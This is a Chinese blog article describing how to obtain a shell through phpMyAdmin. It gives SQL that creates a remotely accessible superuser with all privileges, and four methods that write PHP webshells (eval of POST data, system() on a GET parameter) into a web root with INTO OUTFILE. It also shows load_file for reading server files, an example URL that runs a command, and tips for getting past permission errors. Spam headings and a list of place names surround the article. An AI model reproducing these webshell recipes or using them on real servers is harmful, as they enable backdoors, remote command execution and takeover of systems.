中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

PHPmyadmin拿shell的方法有哪些

發布時間:2021-01-05 10:04:35 來源:億速云 閱讀:270 作者:小新 欄目:數據庫

這篇文章將為大家詳細講解有關PHPmyadmin拿shell的方法有哪些,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

PHPmyadmin修改用戶密碼

直接點擊上面的localhost或者1270.0.1,出現用戶一欄,點擊修改即可

添加超級用戶guetsec密碼ooxx并且允許外連

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

我們可以創建root賬戶設置密碼

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

這樣就創建了root外聯賬戶,密碼123456,外鏈時用123456

拿shell四種經典方法:

方法一:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval_r($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同時執行,在數據庫: mysql 下創建一個表名為:study,字段為7on,導出到E:/wamp/www/7.php
    一句話連接密碼:7on

方法二:

讀取文件內容:    select load_file('E:/xamp/www/s.php');
寫一句話:    select '<?php @eval_r($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd執行權限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

方法三:

JhackJ版本 PHPmyadmin拿shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval_r($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查詢結果為空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval_r($_POST[cmd])?>');# 影響列數: 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影響列數: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查詢結果為空(即零行)。

方法四:

select load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

然后訪問網站目錄:http://www.2cto.com/study.php?cmd=dir

Phpmyadmin導出一句話時出現(Errcode: 13 - Permission denied)

是對此目錄沒有權限,可以試試上級目錄,或者下級目錄

再不行試試NTS引流

還有就是注意目錄\

關于“PHPmyadmin拿shell的方法有哪些”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

梧州市| 无极县| 泾源县| 溆浦县| 日土县| 乌审旗| 喀喇沁旗| 汽车| 九寨沟县| 石渠县| 越西县| 炎陵县| 松阳县| 榆林市| 兰溪市| 福贡县| 上饶县| 昆明市| 民乐县| 格尔木市| 苍南县| 富宁县| 行唐县| 沅陵县| 三原县| 黔西县| 个旧市| 万州区| 桂平市| 武宁县| 乾安县| 台北市| 深水埗区| 剑川县| 平南县| 阳朔县| 汝城县| 扬中市| 三原县| 海安县| 彝良县|